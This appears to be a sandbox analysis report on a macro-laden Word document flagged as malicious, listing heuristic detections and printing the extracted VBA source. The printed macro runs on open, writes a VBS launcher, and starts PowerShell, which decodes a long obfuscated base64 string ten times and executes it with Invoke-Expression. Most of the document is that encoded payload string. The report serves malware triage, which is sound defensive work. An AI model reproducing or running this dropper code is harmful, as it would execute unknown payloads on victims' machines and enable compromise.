MALICIOUS
250
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 20224 bytes |
SHA-256: c2c510e154c91a7827341302aa9fc61c7721f6c69d3b9bba628b6e5898c68394 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
383 of 422 identifiers look randomly generated (e.g. 'RldOWkRWU1U1YkRYa2NXZHMxMFcxV1') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim msgBoXX As Object
Dim XTukL, XCsmNd As String
XTukL = VVV
XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b"
Dim x As String
x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
savefile x
Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
End Sub
Function VVV()
Dim str As String
str = ""
str = str & "k=MDVUUFhkVVpXbFRVZDZrVFJSYTRX"
str = str & "VmJOWnYxYVtaVmpYbFhlaGRtc1ZSZF"
str = str & "prVVFaWmVrVm1oU2pGRlNXdHZtMltZ"
str = str & "TWRXSGhlWkNsYVd0VFJxR1hiSlVuR1"
str = str & "FOZDRhV3hXaGIzaVxoV25zRkdkRlZq"
str = str & "MFtvYWxXRWdjSkRtMFcxVkp5VldNdF"
str = str & "VHSGZwVEp3a1FZSmJGUmhwU1ZXMkFU"
str = str & "YzZsMF13VmRORmlhMUdFYVVaVFV3Rl"
str = str & "piaFVsSFJKVTRrR3VWbDJsbFxaVmRX"
str = str & "bG9NZGYwcFZwYkpUalRTTnVHQmxSVm"
str = str & "gyV2diWldsR1JOVjF4VExZcEExWGxk"
str = str & "U2pzbF9XVklVelxwUmRWbmJXbHZWb1"
str = str & "tkWWhUR3ZXZF1Wd0JRZDB3bTRWTj1t"
str = str & "U0ZoYkJ0MVdSRnZqMVZVTUJXaldWSl"
str = str & "lWb1BkWTZYREdNOVNFWGxaV2Z3bFlZ"
str = str & "UlJHWGNkYTRHMWBkMTZtaF14ZWhTbW"
str = str & "VUWnYxMVpBVmF3bVdSWlNIR2AxVTEw"
str = str & "VzFWUj1XV0ZkTVt5RmtTeEZtWV14Um"
str = str & "ZoWFdNVX1GeExjVm94RmNieFNHc2xk"
str = str & "VmZ3akhWWmZFWlZsY0pHbEtheGUyNF"
str = str & "ZWTVhTM2NZWn5sd0taWWpUbEhScGRY"
str = str & "SFdSWVJHa1hXQmZuV1xWUmZIR19TeE"
str = str & "lXcldoTVJXRFNiWnQxa1FoVTB4Rnxi"
str = str & "SmFGc2ZsVkBzWHZZeFEyVmVoWkV4Rl"
str = str & "hOMHZtVl1oTWxTR2djRkIyR1BkVTpy"
str = str & "a1dhSlVuWVJKVjBDMnlWRnJUV1U5ZU"
str = str & "l5VldlWnlrWVpsUn5hSEhiUX1Wekcx"
str = str & "VlB2RXliZGpGc1ZWV0ZzakNVaD1XV0"
str = str & "xKU2B3RTRhZDkwelZaYkRqa2dXcE5G"
str = str & "R0d0WVpYRURiZFNsV1FsVjF3bTpWd3"
str = str & "EyU2doZEVYVTplWlpWVFRGYllXazZX"
str = str & "WkYxa1d4VlBIVnpNTmVGWGxaZWRvbG"
str = str & "RZeFIyYV5KVGZHbVdXUkdreVhCTVRo"
str = str & "RmNiTnNsS2RKVlBQVnFSbGdrVl1KYW"
str = str & "M1MnNWVjJsVV5kVmpyVl9ZZGlsV1Za"
str = str & "V0ROWGhXWXUxQ1FSVjpKMEhNNWdrc1"
str = str & "ZKVlhhMnJZcHZsYVROY0pzVl9WWmRs"
str = str & "eVtwTWZWR0RjWnNGd1ZWVFVYazxSaG"
str = str & "pGR1JGYjhrV3VXaF1tU0dsYk5zMUNS"
str = str & "ZFdWSFNCVj5YakJWVnYya114VWJWV1"
str = str & "pNRmVHSGxaZGBHbnhVeFJtWG5OU2pH"
str = str & "MkRkSjZqWFVwYkhXbXZUNVRFc2pGVm"
str = str & "p6RkZiRlNIcmdKVkVPbTlVeFJtTlho"
str = str & "TUp0MVdTdHZtcFs1UmJsSFhaTXIyYV"
str = str & "RGV1hvR2lXVmRsRVJOUjFLbTRWaFYz"
str = str & "V1RCY0pybFtXaGlVNFxWUmZOekhjUl"
str = str & "dGb1BkVjpVa1hiZFZrdFZKTUprMVFW"
str = str & "SlNFaVZOY0pIbUNjWlpWT11SVmhYR2"
str = str & "lhSlYyT11wVWZ6VEhSOWVHWGZaZUp3"
str = str & "VlRUUlJYYVhkV1ZHVlFZeGZtaFNoUj"
str = str & "hUbXVVTnMxR2RKVkEwMldhUlNER2JK"
str = str & "VTFvRzhWRlJUa1xkV2t3RmdWUklsWF"
str = str & "VKYkhWRWdaWlExYWd0V1kwVl5WWkVs"
str = str & "VVUxZEphVVxWWk1GV0ZSZUl5MVFUVm"
str = str & "kwNFsxTWRXRWhjWlRWQ1ROWVBvRnJi"
str = str & "ZFRrdFJOVjl4akdWa3JsTlZwWk5GMk"
str = str & "tSZEYwd1ZZVl5aREhkSkJHa2VoWlow"
str = str & "bFhWTlpGc1ZWY1phMFBVaHdHVFhoVV"
str = str & "FIMDFhdGZtYVdoYl5ORkdhcEMxT2Fa"
str = str & "VToza1dhQldsclJGVjpTVVpZcF1rV0"
str = str & "hkTlV5MVNSZFRWV1dSUlphSENaNXYw"
str = str & "MFZkVkBVVnlWaGpGc1ZWZUZaVEZWaH"
str = str & "YzWFxsU2pyMkRVZDlVeVdSTVRXa2VT"
str = str & "WlFGYW14VmpZVVJibFdsc1FSZDZrRE"
str = str & "VWQjEzV21wUmZIR1dTWnlVaFVaVkRa"
str = str & "RmhhSkVtV1I1VTp6a1hNZGdsR1xaZW"
str = str & "paa1hZVlF6WG5OU2pXVkFZQmZUTVxw"
str = str & "UmROVmJPVnRGS2ZaV1hQMmhhcFNIV2"
str = str & "sxVmFHVzZVcF1WaUc5Wkl3RlNjMVVt"
str = str & "b1JoYThUbGhXTXVGam14VmBaRnhiNW"
str = str & "drc1ZaY1ZhakRWVjZsWltSUWF1az9W"
str = str & "aGkwelVwYkRVSGRlVnZsNFZkVFVWaz"
str = str & "5WUkZuc1JOYjJLVlhXaFYyU1dGYUpZ"
str = str & "RkNXWnRVclhSYlxXWGJSSnUyc1tkV2"
str = str & "B6VnNNZFNrNlxsY2Zha1hVWmIwalxk"
str = str & "V2l4MVRVMTZteV04VmROVmhPVkVXWm"
str = str & "BaVjIzM1VWaFVsWFxaVGVTMjhWWl1s"
str = str & "VkhoTUpYMVRWZDZrcFZKYkZTblhXSX"
str = str & "QxS1dwV1kwa0dlZF9WSE1GZWZaakFW"
str = str & "TT1uVkRGTlpyRkFiVmdrWF1SUmRYbm"
str = str & "dXUldGS1tWVmBZRnRiaFdYeFJNYTow"
str = str & "akJWQT1YaEZkY0JIR1tkWkkxWFZwUl"
str = str & "JXbFhVSkYyR1VkWVBZa3dNZFVGeWZV"
str = str & "TUp3VldUNVJFWGtkV2VXMDFRMDZtUF"
str = str & "ZwYkRTR3JhVnNGU1ZkV1poa0dhVldr"
str = str & "R1ZaYVhrbXFVNT1VU0dGZUpIRl9WSm"
str = str & "lUYVJoYThWVmJNVn5Wd0ZjVlI0bklS"
str = str & "ZG9WdEZOY1pXMFhZaGJYVmdoY0pyR0"
str = str & "tXdGZXNVZWTVRTWGRNWnNsQ1ROWVhU"
str = str & "MnFSTmJuc1A1UjhrbX1WQkJYV1ZkYU"
str = str & "JZbFplRkZqdlZaYk5VREZiMVFFMGVk"
str = str & "WlowRl5iTk1UdEFWYjFTbTlZcFJGVm"
str = str & "VkWkl4MkNUWlYxWV1oTWRXVmJOTnNW"
str = str & "d1VaWlBXbHhWUlNrV1AxVjJLMVNVQj"
str = str & "JUaF10V2RyRmNTNUZtVVdSUlphRldj"
str = str & "bFQxYWZWVkZZelhhUmNsdVZKZVZaak"
str = str & "BZbzFrV2RaY0pzVl9hWmpFSVFaUjZr"
str = str & "bUdXWX0xYU14VmBWRX9XWkNsc1JGYj"
str = str & "o0akZWcDJFTm10Ump0MVFSWmYxMFJR"
str = str & "YTJXRlllSXFsc2J4VTVIVTdNaFkzcl"
str = str & "ZaVFZLMFlVUlJtYVxsV25zMktWcEZt"
str = str & "MlhCTVhobGVSNVJrS1RKVlV3VEZiaF"
str = str & "NIc2xaVGhhbXZVeFZtWlVOTlp0RldV"
str = str & "dHltVVJSYTRYVmJOVnMyU114VmBZMH"
str = str & "lhTmJGSGdSU0p3MVhVUlJXYVdoY0FX"
str = str & "MD9WaGZsNFVWYl5XVUhOWl1Gd0taWW"
str = str & "JWM1hSTmduR1A1UjQ0RmZWSnJWU2d4"
str = str & "YkRZRmdlQXZqaFhSYlxXbGdXWkUxR1"
str = str & "cxVkAxVndNOVNrcVZWYUZha1lWeFJt"
str = str & "UmtsU2l5MVtSVmdWYVhCYkhTbXZXMV"
str = str & "VVWmd4WlV2azdhaFVGeW1FVmVTMjhV"
str = str & "UkJtTl10VmRXRmpNWllrVFRsUl5hSE"
str = str & "haWXUxR11wVmA2a3lScGJGV2s1Y2RL"
str = str & "MGJWcHExWmRSTVpybE9UTmdUNFZsYk"
str = str & "5XRUNhVnNGU2tkWWVTazdiZFVseVFZ"
str = str & "Ujh3MWZWQnZuU1ZOWkZHbU9jWkpVR1"
str = str & "dSTUpXblhVMUdrd1BoWTB5bHhSQm1U"
str = str & "eUxZZWhLbXNWWnIwbF5SV214Mk9RdG"
str = str & "dXVVFwYThpbGVUWndGeF1zVmV3VEdi"
str = str & "OVFHdGAxVTFzVzhWWkYwWF10V2BWMX"
str = str & "dVeHZtWVtKZWppbklSWXIxMGZkVlJL"
str = str & "M05hZEFsVVUxV0hhbXRVaEZtVV5GVW"
str = str & "pIR09XaGYxSFtaTWJUREdaZFdWd1RC"
str = str & "WVhUMmhSTmRueFJNUjJLVllXSlJsTm"
str = str & "xkUWI2R1FXeGZHdlRGYlxWa2hXWXJG"
str = str & "d2VaWlAwbHNSZFVsc1ZsV0pLa1dZSl"
str = str & "JsVG5OUmF5MVBiSjZqWlxaZWVoRThh"
str = str & "cENsV2J4WTByVndSTldqRlxaV2A1Vz"
str = str & "BWcDZrWlhOZUV5RldXWnRWVVhSUlJq"
str = str & "blNXNXQwNGcxVlpQRUlTVmZsclZOZV"
str = str & "ZKekJVaHJYV2hoTUpybUtUWmlrMVxa"
str = str & "UmRURXJabHVGd1RGWVhZR3xTaGNrdF"
str = str & "JGUjZra1pXSlJrV2dwT1BIbHNjRnZq"
str = str & "dldSTUxXRmhhZEZWb1FoVTY0bFpWQl"
str = str & "1UdExaTWFvVzRUaFJtaV5SVWl4MUtU"
str = str & "QmZUSVFKVjRORmdhTkYyYVZaV1Jybl"
str = str & "dNZFNFVmAxVjM1VmVUbDJsVFhkZEJY"
str = str & "RlNXSllUV1xwUm5pWEdOTXlXYVtaVm"
str = str & "hZWGxiTmVGdGZWZFZhakJWWnFrV2ZS"
str = str & "YUl6MVFWeGUyWFBwVjlobTJXZHdsU1"
str = str & "ZkVFxUemNhVldsR1A1UThTV3lXeFVt"
str = str & "U21wV25yVkZlRllqclNSVjZYbUpRRX"
str = str & "UyU114VWAwa3pWZGVGSGZwYUZhVEdZ"
str = str & "aFJHUm5WU2ZzMkRhSjZqNltwVmxOR2"
str = str & "hkUkVXWmBaVTpYVkVWUlFGdGZKWVRr"
str = str & "bXlWWlJWV21GVmpyMVtiRkRUWF5CUm"
str = str & "Roa2RTNXIwa1pCVmpRRllWZGFscVZW"
str = str & "V0V4a1hWQkdIWFhsY0pHMk9UdEZHVl"
str = str & "d4TV5VVkRNVnFGd2RGWVhWV2FSZGJG"
str = str & "V2ZsWVo0akJWazJUV2ZOWk5HMkVWVT"
str = str & "pFcltaZWhaRXdjWldsS1c1Vlw2VWdN"
str = str & "ZFVsclZsZVp3a1ZZUlEzV2NkYTFHMD"
str = str & "RkMTZtWlRWVllXazVVZHIxYVRGVlJy"
str = str & "M1hWbFNGR2dKYVpXVVpZSlZsbFtwV2"
str = str & "BWVnNjaFlsWFtwZWhpWGhSSkEyNGpK"
str = str & "VmI2M0dhcFRHdGZKY1pXRVRWcFZFWl"
str = str & "dGYUpZRk9heGYyWFd4TVJqalFTWndW"
str = str & "YVtWVWhPV2NiaFJrdFFKZDZhakVWWk"
str = str & "ZGaVxkUmVYaztjMUZtUFJoYThaRmNj"
str = str & "WnRsd1ZoVFJZR1didFdrc1ZsVko0ak"
str = str & "hVcGZsT1hkVVp0MUdTMXZtM1poTWho"
str = str & "R2daRkRHT214VWpyRVdWcFVuSFdKVl"
str = str & "RrMnNWbDJrV1d0TlZ0RlFlWmRWT1ps"
str = str & "Un5oSEdiZEExb1RCVlp4VkdiNVNrSV"
str = str & "ZwZUpKakhZUmJYV21oU2B3RTFhVTdr"
str = str & "eltwVmZXbUZSbDZGd114VmhoV2ZicF"
str = str & "dYV1FaYjhhR3VWQjZuTlZWT1ZIV1pl"
str = str & "WlUwWFZKYkJXbElRSldHa1J0VjpYbF"
str = str & "JNOVVHWGFaZDpLbFRZaFIyaVhOWkZH"
str = str & "bVdTcEZtTVVwYkRTbGVRNUQwSmZaWV"
str = str & "B2MXphaFdrd1ZZYkh3MnhWeFJtVVc5"
str = str & "YUxzMWFWdGlXWV1SVmROWGdWMUVFd2"
str = str & "xjVm41R0lXTmVsR11SUmRXRWhacG1W"
str = str & "V0t4VWpZbUVWYzpVSVBwUj5XVkhOWl"
str = str & "5GeE1zVWJQWFhiTlduR1FSUThvbXBW"
str = str & "VlF6U2doWk5GR0plWlpVV1tKYWpXal"
str = str & "lRSkYyV1FaVDB5a3dWdFNrcVxaZGVv"
str = str & "VzdUUlJXaltaU2ZIMktSVmdsMVZZYk"
str = str & "lXRTNaRnNWYWVaVlgzWGZiSlVISGZk"
str = str & "V0hPbGNUMT1VU0hkWkpzMV9NTmVqWF"
str = str & "s1UmJrbldUUlMyR11wVmJvSEdiaFFG"
str = str & "SGdOZUpGakhWUl1uV0VoY0pzRlthNW"
str = str & "YyeVdSYkZsVEdWUlNWU2xoVWBoa3hi"
str = str & "ZFdreFFZZDAxbTpWQlJuaV1oVGBHMX"
str = str & "hWc3VtSFVwVk5XREZjWkYxU1dwVVAx"
str = str & "RnVidFdtclZkTVRTa2FZNXJrU2RaYk"
str = str & "B4MD9ieGdXWFRWUlBUR3lhSlVWWmpG"
str = str & "WWJYbldNbFNFc2ZaYVhrR3dWNUIwa1"
str = str & "dGZUV5MVFNeGZtVldoYkhWa2lTWXQx"
str = str & "MVRJVlo2Rl5STkRGRmdOZEphRlRWaE"
str = str & "EyWmZoYUp0Rk9hNUVtWFFKUjpsRURj"
str = str & "WnVWd1ZWVFJvbkFSTmNuV1FaUzZhVl"
str = str & "NXRjYxV1ZwY051MUFjWmYwcldoVlJh"
str = str & "RENjSnYxR1NwWTowVllNRmN6dGZsV0"
str = str & "RvMGdWaFdHVVhsVlVHMDRhMTZteVBJ"
str = str & "TTRoRmRiUnMxS2BaVToza1dhaFJYRl"
str = str & "ZKWVU1MFRZVjYwV1ZOY0pIVldXUkRV"
str = str & "WFZaUkhObGNWZHIxU1d4Vlh2bXdlNV"
str = str & "VrdVFkYzpXekBVRTJUV2xaU2pXMkFW"
str = str & "czZXMVZwTVRTbGFSVnZGb1pOVmhZR3"
str = str & "JicFJYWFJGYjZhVlFXQmEzU2ZSZER0"
str = str & "MWtWeGpHTFFaYTxXbGNXRnVtV1I1Vj"
str = str & "p6VkhNRmZtV1xkTWJGVVRUaFJtYVhO"
str = str & "WkpzMVdkUkZGMlJoUjBpRndhNVNrS2"
str = str & "cxVlgzR2ZiVlZqV1AxVTM1RWlaUlZt"
str = str & "WF5kVmJXRldXcFlYVVtwYmhXWGhXRX"
str = str & "5HeE0wVmh2bW5NZEJsSFJGYzhPbXxV"
str = str & "RkJUV2xoVmFxaz9WdGZXWVRGTUJWRE"
str = str & "ZacENWd114VmJzbVhiZFVseFJJYjB4"
str = str & "VzhWSn1saEZOYUBHRn5lRkV6VFhoYl"
str = str & "JXVEVSMURrT1taV2BIMHtWOWJrcVZa"
str = str & "Tk5PakFWUmdHU1hGTVl3MVRhSjZUNl"
str = str & "hCUlZpbFhSRkJtd1FaVjEwbVVWaFJG"
str = str & "NmxaVGVTbTRWMTIwT110UWpxbFdXcF"
str = str & "lYcF1SUmxobGhXSXVGQmZSV1V3RVlW"
str = str & "ZGFGdGZGZFZhVEBWcFJGVWhsTlFWMD"
str = str & "dWUlZsR15CUmloVzhOUllWd1BWVThx"
str = str & "R2NXaFdseFJFYjhhbXhWa31WaEU1Wk"
str = str & "lXRTdTZFpFWFhoYl5XaklVSlZtQ1xo"
str = str & "VGB5VnVNTl5WeUZZU0RTVmdUUlJYWG"
str = str & "tkV2pXMVFTQmZqd1JoUjZpRlZiTkVH"
str = str & "WmpGVmJMM0hWQlNUclJWVjhvV3pVWn"
str = str & "JFbGtaU2pVRlZNcERXWF14Ym5YbkdT"
str = str & "ZEExYWZaVk93RmNiUlRGRmdWZEphMV"
str = str & "BWbzZFWlxWVW5IbEtUaGYxWF14Vm5a"
str = str & "a0hVWX1WWkd4WlVvazxSaGRreVFJVj"
str = str & "JrVE9WQmJuTlxkVWZGR0hTQXZqelZw"
str = str & "Vlxha2hVMVZVR1VkWkY1bFhWRlFtcV"
str = str & "FWVDpvVEFUcGJrWGhoV1F4V1BZZDYx"
str = str & "VlVwUlxYbWNXWnYxeF1zVWBUa3plaF"
str = str & "NtclJGVjhrbGRVbDZraFdGZUZ0VlFN"
str = str & "eGVtVVhSYlpYbkdXWkYxd1ZkVkBZRX"
str = str & "hiZGpGWVFOYzpTVVRUQjZ6V1pSUWp1"
str = str & "VkVhczZHMVtaVm5XbkdXa3ZGU1RKWV"
str = str & "BhbH9WSkNuSFFaYTQwa2BWdzZXTl1o"
str = str & "VG5GR0FkWmRrWFFwYTJabFZWRjdHa1"
str = str & "10VmUwazdNRlZtclZkVFhDa2hZaFJt"
str = str & "bFtaUm5IMUtTeGZtNlxaYWRORmdaTk"
str = str & "QySmBaVjpyMVhhZFFrdVxKVGVrMjlW"
str = str & "eH1XVUVOTlZ0MVtjeEltWFs1YmRYVm"
str = str & "JNRnUxYVpGVmBaRnxiaGJHdGFkUjZ3"
str = str & "akNVcDZWYVVkY0pzVl9WcEZHSVtwTW"
str = str & "5XRkhjVldsd110Vmxvem5WaEdsc1JW"
str = str & "ZDphRlhWcHZWaVxOUmp1MVdSRlZUNF"
str = str & "RCYlBXRnZjSlYxYVd4VlUxazxScGJs"
str = str & "NlZsYUZLa1lWcFFsUmhwUlV5MVRiMT"
str = str & "ZXd1FJUjBpbXVUZHQxVmVaWlJHM1pW"
str = str & "ZF5WRkxOYWRhMnlVUk1XaERSWkpzRl"
str = str & "pNdFZtT1J4VjpQa1hUUklXNFpKVmBN"
str = str & "bH5SWkZsc1ZGV1RLMGJWcHZsVVhsTl"
str = str & "FyaztWdGZXeV1SUmBOa3JWWnNGU2tk"
str = str & "WWpXMVVhUlRuWFZsTkRrbXJWaF1tTk"
str = str & "ZOWkpzVk9SSkVqTFtwYWJXRkVhMXYw"
str = str & "a1BaWTB6VXdNOVVFeWxVVmE0bTFWSm"
str = str & "ZGTl5SVml4MktiUkdWV1pWYX5pRkli"
str = str & "UlVGSmZkV1JoWFdicFNGd2dFYVprbF"
str = str & "lUUn1XV0pWY3t5RmdXWnZsaFBaUj5q"
str = str & "bkdXZE5GMEpKVmpJRV5SZEZsNldOZV"
str = str & "haV3NaaDJYVmZkYko2MUNhaHZsWF1S"
str = str & "VmZaR0hlZFZWd1VaVFJUWFZiVlpIeF"
str = str & "dNTVJCa1NXVjZFaVZkYk5HMktSSkZU"
str = str & "d1pFTWZWREdjMVYwNVJzVjJXWEdNRl"
str = str & "VHdGZaV1pha1VZaFNHTlhkV1V4V0BZ"
str = str & "ZDYxMlBJTTRobGdURkVtTmBkVjBobH"
str = str & "VWTlNrR11KV2pvVVBacDJVV2ZOTlV5"
str = str & "RldOWkRWU1U1YkRYa2NXZHMxMFcxV1"
str = str & "pVMUlSVmpGclZKZVpOakhWWmZsWFhk"
str = str & "Ull4bEtUWmdrSFBaVjpsRVJaWnRsb2"
str = str & "0xVWpYbEdhZFdYc1FkVTp3VERWQjJI"
str = str & "V2ZwT150VkFjWmkwWFZKYklWbTNTSn"
str = str & "Yyb1ZoVkY1MFpWRlRHeWxZZGRLbXhZ"
str = str & "UlJHU2toVWp0MUtUcEdYb11oYmRObG"
str = str & "NVVndWS1pKVmZ2VFZiWlJrRVAxVjJD"
str = str & "a1dXQkZuWFdGZUp0MVNUZFUwclxKYm"
str = str & "hXWGlTVXVGd2xjVmg0R2lXTmJsSFFw"
str = str & "YzphMFhVVXZWYVpOUWpVMkdWeEYySF"
str = str & "ZwTV5WWEhNWlVsd2ZaVFJxR1NiRlZu"
str = str & "R1FWVTB4bTpWaF1tU0doYk5zVkplRl"
str = str & "VqaFVKVkpYallRWlRsYVd4VkJKSEdi"
str = str & "TlVIeWZVU0pLbFZWcFNFaltkU2V5Vl"
str = str & "NZdFdXSVtwVmJObFVVMVRFYWFaVjpM"
str = str & "RlZNbFFGdGZKWVVLRzhWNU1VVEt0VW"
str = str & "RXMWZkdFpXWF1SUmBhWHhTVkJtS11w"
str = str & "VmJVWEhNaGFGcmZGV1F4akJWVnJUVm"
str = str & "5oV2FXazVUYzlVel14UmZYbUFRVnIx"
str = str & "S214WWVVazNibFRYV1AxZDhqbXRWTj"
str = str & "dHaVZkTlJyMVdSWnYxNFZWTUhXR2dj"
str = str & "MVZrNFBWWTBIVXhiOVVHWGxWU2R3V3"
str = str & "hUUlJtbFhsV1VHRTplZHZGWFZwTUhT"
str = str & "bXVVZHMxV2cxWkpEbEhWWlFudVZKYV"
str = str & "pLa1hZVlF6amt0UmY2bF9jaGlsWFps"
str = str & "UnpqVlZNRkQyYWZWV1I2M0dhZFRGRm"
str = str & "dWU0ZhVEZURnJUV2ZaZUp0bE9hNUUy"
str = str & "WFZwTVZoekdZWlYxb1pOVmhPV3NiaF"
str = str & "ZrSFJSVjBHV3VXQlJYV1xwV2ZHR1tT"
str = str & "WmYwdl1oVmJXVFZNMVEwNWVjWlAwVn"
str = str & "VNdFZrd1ZZV0JXbF9VaGJXalhoU1F4"
str = str & "V1dZUkZsMFZZVl5TbEhSUkJtT1pKVW"
str = str & "Y0a0dhWlVuelFZVjhzbXZVcF1WV0U5"
str = str & "YUJzVlNOeHZtc11SYmRXbGdVZEMxU2"
str = str & "d4VlB5RXliZGpGclZaZVZWVEhZcGEx"
str = str & "V2ZoY0pyVlNhZHdrels1VmZrbUFSVn"
str = str & "NGd1tWVWhoR2RiSlJueVFZUzZhVlhX"
str = str & "WXVraGxWVGBJbHtjWmpWeFxVVmJVbF"
str = str & "ZXWkYxYVBaWTVYazlNOWVHWGZkV1Fv"
str = str & "VzRUaFIyaFVaY0l4MVtSUkdWd1xFTW"
str = str & "RoRmZiTkIyeFpBVmh2M2dSaFdreFFJ"
str = str & "YThrbXZVSlJsaFxOVGpxRlFhVmlsVV"
str = str & "JSYTJUblhXSX1HS0xSVmYzRUlTTm5W"
str = str & "RkFwYzZhekJZaH1uVktSVmpVbUNWaE"
str = str & "kwSFBwVjlXRTJhZH5GR0xaWWpxVVJi"
str = str & "VldsV1FSYjJLRllWcFJsaVxOVmp1MV"
str = str & "tWRmV6TFhCYlFXRTRhMXFFb2VaWVV5"
str = str & "VTpNaGFYVVxsY2p3bFhVeGJHVmZoTV"
str = str & "V3R0BNZDZWV1VwYkRTVmhPcEMxc2pG"
str = str & "VmhoWGpibFFGSGZkVlhzMWhWWkJWaG"
str = str & "RCTVp0MVtUVkYwVFJ4UjRha2lSSXMx"
str = str & "a1pGVmBRMXxhcGVscVxKY2pHakRWcF"
str = str & "ZWWlRaYkFWMDtWaGpFNVZsTV5OSERk"
str = str & "VndGS1tWVmhPR3hXZFpFeFZVZUN3bG"
str = str & "FWaGIzV11sVWpzMVtSSkl6aFFwYTpV"
str = str & "bkpVWXdGd1d4VVBaa3hSRlN6eWZVTV"
str = str & "hhbXNVcHJGU2VWY0JHMV9ReGdXWVtK"
str = str & "YmBTbXdXMVQwWmZaVFpXMVhhcFZrNl"
str = str & "1GVGR3a2lXUnJtbF5KV2l3MVFNVmZr"
str = str & "YVdoYkRUa2lTVXYxNFRKVll3MU5WVk"
str = str & "JsdFFaYzhrMnRVNUZFWlU5Y0pzRlNV"
str = str & "NVZXWFZwTVZqR0hkWk1GWktaWWpYRl"
str = str & "hiTlZuR1FOUzJLbFlWaFJtTmZkYUpz"
str = str & "bEdOSklUSFdSVlxhRmNjSnZsT1xWVG"
str = str & "owbFpSRmZUclFsVjhhbXlZaFdHWFho"
str = str & "Vl14MU9keGZtMltKYmVXRThhRkMyYW"
str = str & "pGWXBIVnZNeFNFcmJGVjRvV3lWcFJG"
str = str & "WG05VmJzMVdWVnlsb1hSYlRYbGdVNV"
str = str & "MwYWd0V1h4R3lWVmJsdVZkZUpaVldX"
str = str & "UXZtWFxwUWpZRkFXczYyeVtwVmpsRV"
str = str & "daZF1GUkRKWVVYazNhWlRrV1JGYTQ0"
str = str & "bGZWcDJraVZOWkFWRTFkWmZrM1ZwYk"
str = str & "ZXbUhTRXYyV1J4VTIwbVpWRlFtVVZk"
str = str & "U1hDVWhUUlJta1toVW5IVkFZeGZHWV"
str = str & "FKTTZXbFVRZHZsS1BkVjZMaldNaFZr"
str = str & "RVUxYVEwVzhVcH1Wa0c5TlJYRlFWQm"
str = str & "VqaFtwYmRVRWhaRXIyU114VmJ2bk5W"
str = str & "aEFHV2U5ZEpHMVRWVjZWWlZoYUl6bF"
str = str & "tWcEluV1twTWJWRERkVnVGd214VWVv"
str = str & "RTViRldueFFZUTJPVlVXQlJIaGZOYk"
